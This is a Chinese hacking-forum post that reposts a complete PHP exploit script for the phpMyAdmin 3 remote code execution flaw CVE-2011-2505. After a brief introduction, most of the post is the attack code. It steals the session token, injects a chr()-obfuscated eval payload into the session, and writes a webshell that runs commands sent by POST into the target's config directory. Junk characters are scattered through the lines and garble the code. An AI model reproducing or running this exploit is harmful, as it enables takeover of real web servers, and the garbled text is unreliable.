中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]

作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
( c( k/ t( D, X9 e7 m) h% M# L( Q) g( h7 j
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
, d8 K; h2 A% v: t+ t  T1 S& ]2 c1 v
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:+ r- e  K; R" Z. T* ]
一是session.auto_start = 1;3 _/ \9 T) |" _: ]; @
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
2 R0 w! u! R4 K4 p% h当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
. }* _* e) O' a- a0 \- A" b3 w$ D) K
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
  R! N. l2 y% N. ~4 ^9 J/ |4 K+ K# z& V+ r. S9 x1 |9 W3 d3 J
于是写了这个php版本的exp,代码如下:
5 O/ T; S4 L( Q/ R0 E! M, A9 U
9 M% L% _( V7 n+ {7 Y/ p( @#!/usr/bin/php
4 o2 T. o1 M) _<?php
9 y6 Q+ |7 d: v6 X/ ~& M9 Zprint_r('- K6 }. T: w  |- ~. i$ k* ]  B
+---------------------------------------------------------------------------+
( H; @3 o9 n' z! ppma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]& Q" E; n8 d" U
by oldjun(www.oldjun.com)
! Y! [$ m/ C8 m% Pwelcome to www.t00ls.net
% U% v* i+ k0 x9 i9 {mail: oldjun@gmail.com: m2 f* G5 H1 u" v/ ~* V: S
Assigned CVE id: CVE-2011-2505
8 c# Q2 {+ H1 B, T8 ?  K: L0 j+---------------------------------------------------------------------------+2 w' P6 g$ ?/ M9 K
');. a: o# `4 F( y) n) u6 A

. G! [0 ~4 X# ~3 ^- M% a; K/**
6 D# R* r" v' G: @2 T * working when the directory:"config" exists and is writeable.& ]6 }. d& a8 _1 d
**/' n% C( m0 A5 I) U* |/ l7 a" C

" w1 b  C" f4 `% i" \2 aif ($argc < 3) {
; A8 h" J% C) V  e    print_r('' B0 V0 Y# D9 `) n, y
+---------------------------------------------------------------------------+0 k; ]- c' ^+ o6 c/ ]
Usage: php '.$argv[0].' host path0 {+ m  t0 @% x6 `/ p! E" h4 X( G
host:      target server (ip/hostname)
' p0 B; s9 `* Ipath:      path to pma32 C' }8 }$ F* H) Q9 q
Example:
% m2 E  Q# E. O( ]8 s/ }* Ophp '.$argv[0].' localhost /pma/
# S9 _# i* x! V* A6 e+---------------------------------------------------------------------------+
8 `  B& a$ b* `& c) r" a, V4 Y');6 [6 a7 u4 Q. I3 B
    exit;; _  u. o8 R+ [; C
}+ J$ `" N7 K" P! ?8 s2 u+ Z$ [
' U9 K+ |0 X5 }3 S6 y) j2 d& J, e
$host = $argv[1];7 @" R$ r/ e- e( b) M$ F/ I9 S; G! k
$path = $argv[2];7 T; I8 o: U7 p& Q* {7 c

: ]) h. o$ r0 s( @3 i7 @  T' [/**3 G4 i9 |' c, |# r6 b
* Try to determine if the directory:"config" exists
  r  ?5 H$ M3 H* }, P**/
1 p+ [! c/ p# S* Y3 c  jecho "[+] Try to determine if the directory:config exists....\n";
4 i# X8 S; O# H2 u$returnstr=php_request('config/');
+ E9 u( \8 A- Y9 l8 eif(strpos($returnstr,'404')){
* {3 d* D2 C" v    exit("[-] Exploit Failed! The directory:config do not exists!\n");
: d" ^3 D/ U9 m) a! Z6 R! _% V; s3 x5 z}/ C  `& p& J5 W' a7 i' e
1 d; T8 B: P% L# v0 r/ C
/**
7 l- r& x" ]; ?+ m * Try to get token and sessionid
! V# B% ~$ S5 @# ]**/  [1 _% x6 h! n1 l" K/ `
echo "[+] Try to get token and sessionid....\n";8 x, B% f" R! e! d
$result=php_request('index.php');! K7 l3 j# X; I) e: N: p( }
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
2 R- ?+ ~& p0 [' U9 |$token=$resp[3];. \: B6 }2 u, R2 N8 Z9 B- X/ q
$sessionid=$resp[1];
$ P1 l, ~; g# B( D5 B- K5 n* Eif($token && $sessionid){1 Y0 U5 n0 w3 E
    echo "[+] tokentoken\n";
0 a# H7 n# @% G0 b* b  ?7 L5 O6 u7 g, m    echo "[+] Session IDsessionid\n";7 U" _9 L7 S7 [3 u
}else{
# [9 W* ]7 R% d. V$ @$ c    exit("[-] Can't get token and Session ID,Exploit Failed!\n");6 c, l* z$ L! g8 I9 Y4 R/ ^
}
) @8 I0 K- m' r. Z! |3 Z  @; Q9 @9 ^" j  E* |
/**
* J3 ~7 k* U  i * Try to insert shell into session
. k. Y& g( U/ S# B**/4 d; R7 M% _( N1 G
echo "[+] Try to insert shell into session....\n";
+ ^: U( y2 l) b7 @php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.% R8 T7 t: v, ?, j

2 i/ L$ k, q) n8 @; j) \/**
/ j9 @  c' b9 o/ l3 W * Try to create webshell
0 [2 I) Q# Z5 E" l5 S**/9 H& l: m0 x( j5 }+ I/ M
echo "[+] Try to create webshell....\n";" M+ V- z: q; y3 Z
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
3 c7 u, v- G5 Z& a& f( Q! ], f7 W6 E/**
3 l- E; e5 h% X  ^9 W * Try to check if the webshell was created successfully
3 U& L' d2 n( B1 @3 ^**/
5 c4 i( x( {" {( v, j6 O+ decho "[+] Try to check if the webshell was created successfully....\n";
0 `, m4 P+ b  q% Y8 ^2 G$content=php_request('config/config.inc.php');
# A4 }2 x. ]4 i+ s& ]# Cif(strpos($content,'t00ls')){, k+ \( S: O" z1 R6 }$ u% j$ I9 K% K
    echo "[+] Congratulations! Expoilt successfully....\n";& L! h$ k; @  n8 w
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! d6 ~. A+ g+ r& W}else{2 C; |% `1 ?3 w( v3 c7 q
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
2 z, B/ W. c; {) ?  L( M7 {& ~}& ]  `) q& [$ g9 ]! G9 n& U+ n
  V# b; e- e1 d. c5 A0 k; g$ P) r
function php_request($url,$data='',$cookie=''){
6 d9 ?  p' i5 K    global  $host, $path;8 }. _5 }+ k- ^* y# c& [: ^6 m
   
" T- h# F8 I" b5 o* r    $method=$data?'POST':'GET';
  }, }' n7 Q% l0 y    , E# o8 ?  n/ c! W( w$ E
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
  r$ j/ L9 u% I# s, B    $packet .= "Accept: */*\r\n";% |! C: E, ~: z" a7 v
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
) x3 J/ \, l' J( @7 F5 c) g    $packet .= "Host: $host\r\n";) O* a8 v( a$ ?+ R& B; A
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
5 W& Q/ Q. w8 [8 f    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
+ a9 B0 f& T1 ]& x) A    $packet .= $cookie?"Cookie: $cookie\r\n":"";# M. j' C6 v5 r# N
    $packet .= "Connection: Close\r\n\r\n";
" F2 j: X; O8 e6 v! y% W) ^' ?6 ^    $packet .= $data?$data:"";- I4 {1 O# \, F+ u

4 `9 [4 B0 \( P& p" v' _9 C    $fp = fsockopen(gethostbyname($host), 80);4 @+ U$ F) G" p* F; w
    if (!$fp) {* ]$ x$ e% j" U$ X$ c( B% t' Z1 X8 ]& ]
    echo 'No response from '.$host; die;
. y. C& T9 l9 G# U3 i    }
& |2 i/ ]1 `$ q% z8 ~    fputs($fp, $packet);
8 s  _6 @/ S- f# V8 o: M5 b
6 L' s1 n7 N- Y; s/ y: E. `0 K    $resp = '';
$ M; O" r* Z3 w5 \- N7 D% v$ n
0 {: y; u. `5 u! s, d    while ($fp && !feof($fp))- H/ o) {1 C  @( O# Z- g: t: K% C
        $resp .= fread($fp, 1024);
$ N- Q* @4 h# M. `- o: S5 \, F+ N1 C+ I" `
    return $resp;
: _  M+ v1 d8 S5 @  p$ j}
, H7 {3 b8 D0 _; J   
# Q0 J: c" c+ E) E8 M- |?> 1 O7 Z+ z- A* v: \7 {- I
.




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2